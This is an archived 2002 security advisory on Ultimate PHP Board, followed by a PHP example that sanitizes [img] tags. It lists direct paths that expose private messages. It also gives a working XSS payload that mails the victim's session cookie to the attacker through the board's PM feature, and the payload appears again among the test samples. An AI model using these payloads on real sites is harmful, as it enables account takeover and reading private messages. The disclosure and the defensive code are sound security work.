Computer Security
[EN] securityvulns.ru

From: frog frog <leseulfrog_(at)_hotmail.com>
Date: 23.04.2002
Subject: Security holes : Ultimate PHP Board



Product :

Ultimate PHP Board

http://xcrew.host.sk



Versions :

1.0 Beta

1.1



Problems :

1.0 B :

- Reading of private messages

1.1 & 1.0 B :

- Access to user/admin accounts



Exploits :

1.0 B :

- /members/ID.pm

- /members/ID.xbb

1.1 :

- [img]javascript:window.open('index.php?upb=pm&mode=send&send=yes&target_id=MY-ID&betreff=cookie&pm='+document.cookie+'&smilies=1&use_upbcode=1&pmbox_id=VICTIME-ID&check=yes')[/img]







More details in French :

http://www.ifrance.com/kitetoua/tuto/UPB.txt



Translated by Google :

http://translate.google.com/translate?u=http%3A%2F%2Fwww.ifrance.com%2Fkitetoua%2Ftuto%2FUPB.txt&langpair=fr%7Cen&hl=en&prev=%2Flanguage_tools



frog-m@n
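
The 1.1 exploit in the post above depends on the [img] tag accepting a URL with any scheme. The following is an added example, not part of the original post and not Ultimate PHP Board code, showing [img] rendering with a scheme allowlist and output escaping; the function names are hypothetical and PHP 7.1 or later is assumed.

```php
<?php
// Added example; not Ultimate PHP Board code. Function names are hypothetical.

// Return the URL only if it is an absolute http(s) URL, otherwise null.
function safe_image_url(string $raw): ?string
{
    $url = trim($raw);
    // Reject whitespace, control characters and markup/quote characters.
    if ($url === '' || preg_match('/[\x00-\x20\x7f"\'<>`]/', $url)) {
        return null;
    }
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return null;
    }
    // Scheme allowlist: javascript:, data:, vbscript: and the rest fail here.
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return null;
    }
    return $url;
}

function render_img_tags(string $post): string
{
    // Escape the whole post first so no user-supplied markup survives.
    $escaped = htmlspecialchars($post, ENT_QUOTES, 'UTF-8');
    return preg_replace_callback(
        '#\[img\](.*?)\[/img\]#is',
        function (array $m): string {
            // Decode for validation only; the URL is re-escaped on output.
            $url = safe_image_url(htmlspecialchars_decode($m[1], ENT_QUOTES));
            if ($url === null) {
                return $m[0]; // rejected: leave the tag as inert escaped text
            }
            return '<img src="' . htmlspecialchars($url, ENT_QUOTES, 'UTF-8') . '" alt="">';
        },
        $escaped
    ) ?? $escaped;
}

// Constructed sample posts: one legitimate image, two script-scheme attempts.
$samples = [
    '[img]http://example.com/a.png[/img]',
    "[img]javascript:window.open('index.php?upb=pm&pm='+document.cookie)[/img]",
    '[img]JaVaScRiPt:alert(1)[/img]',
];
foreach ($samples as $s) {
    echo render_img_tags($s), "\n";
}
```

Only the first sample is rendered as an <img> element; the other two are printed back as escaped text with the [img] tags left in place.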

